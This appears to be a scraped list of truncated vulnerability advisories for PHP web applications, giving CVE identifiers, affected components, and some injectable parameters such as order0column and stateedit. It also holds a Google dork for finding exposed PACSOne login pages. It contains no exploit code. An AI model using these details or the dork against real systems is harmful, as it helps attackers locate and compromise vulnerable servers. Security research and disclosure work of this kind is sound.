The vulnerability of the General/vehicle/checkup/delete.php component of the Tongda OA automation tool allows a hacker to execute arbitrary SQL code.

The vulnerability of the General/vehicle/checkup/delete.php component of the Tongda OA automation tool for business processes is related to the lack of measures taken to protect the SQL query structure. Exploiting this vulnerability allows a malicious actor to execute arbitrary SQL code remotely...

CVE-2023-41446

Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted script to the title parameter in the index.php component...

PT-2023-27955 · Unknown · Phpkobo Ajaxnewticker

Name of the Vulnerable Software and Affected Versions: phpkobo AjaxNewTicker version 1.0.5 Description: A Cross Site Scripting issue allows a remote attacker to execute arbitrary code via a crafted payload to the txt parameter in the "index.php" component. This enables the attacker to inject...

The vulnerability of the text.php component of the search engine LibreY allows a hacker to perform an SSRF attack.

The vulnerability of the text.php component of the search engine LibreY is related to insufficient checking of incoming requests. Exploiting this vulnerability allows a malicious actor to perform an SSRF attack remotely...

CVE-2023-37165

Millhouse-Project v1.414 was discovered to contain a remote code execution RCE vulnerability via the component /addpostsql.php...

Human Resource Management System SQL注入漏洞

Human Resource Management System is a human resource management system by maverickosama Personal Developer. A security vulnerability exists in Human Resource Management System v1.0, which stems from the stateedit parameter of its /hrm/state.php component that allows an attacker to implement SQL...

Online Examination System 跨站脚本漏洞

Sourcecodester SourceCodester Online Examination System is an online examination system from Sourcecodester, Inc. A cross-site scripting vulnerability exists in version 1.0 of the Online Examination System, which stems from its index.php component that allows an attacker to implement reflective...

CVE-2022-28524

ED01-CMS v20180505 was discovered to contain a SQL injection vulnerability via the component post.php...

CVE-2022-25403

HMS v1.0 was discovered to contain a SQL injection vulnerability via the component admin.php...

CVE-2020-18646

Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/public/index.php"...

CVE-2021-34812

Use of hard-coded credentials vulnerability in php component in Synology Calendar before 2.4.0-0761 allows remote attackers to obtain sensitive information via unspecified vectors...

CVE-2021-29090

Improper neutralization of special elements used in an SQL command 'SQL Injection' vulnerability in PHP component in Synology Photo Station before 6.8.14-3500 allows remote authenticated users to execute arbitrary SQL command via unspecified vectors...

Sql injection

Improper neutralization of special elements used in an SQL command 'SQL Injection' vulnerability in PHP component in Synology Photo Station before 6.8.14-3500 allows remote authenticated users to execute arbitrary SQL command via unspecified vectors...

CVE-2021-29090

Improper neutralization of special elements used in an SQL command 'SQL Injection' vulnerability in PHP component in Synology Photo Station before 6.8.14-3500 allows remote authenticated users to execute arbitrary SQL command via unspecified vectors...

Nagios 安全漏洞

Nagios is a set of open source and free network monitoring tools from the American company Nagios. A security vulnerability exists in Nagios Fusion version 4.1.8 and earlier, which can be exploited by an attacker to escalate privileges to Nagios by installing a malicious component containing PHP...

CVE-2019-13076

Quest KACE Systems Management Appliance Server Center 9.1.317 is vulnerable to SQL injection. An authenticated user has the ability to execute arbitrary commands against the database. The affected component is /userui/ticketlist.php, and affected parameters are order0column and order0dir...

Denial Of Service (DoS)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The php54 packages provide a recent stable release of PHP with the PEAR 1.9.4, APC 3.1.15, and memcache 3.0.8 PECL extensions, and a number of additional utilities. The php54 packages have been upgraded to...

elFinder Command Injection v<2.1.48

elFinder is an open-source file manager available as a web application. A command injection vulnerability in the image handling functionality exists for versions prior to 2.1.48. This exploit requires that the exiftran utility be installed. Recent assessments: space-r7 at May 09, 2019 5:57pm UTC...

jQuery-File-Upload < v9.22.1 (ImageMagick / Ghostscript) - Remote Code Execution Exploit

Exploit for php platform in category web applications jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability that was fixed in the release of v9.22.2,...

PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php inurl:pacsone/login.php...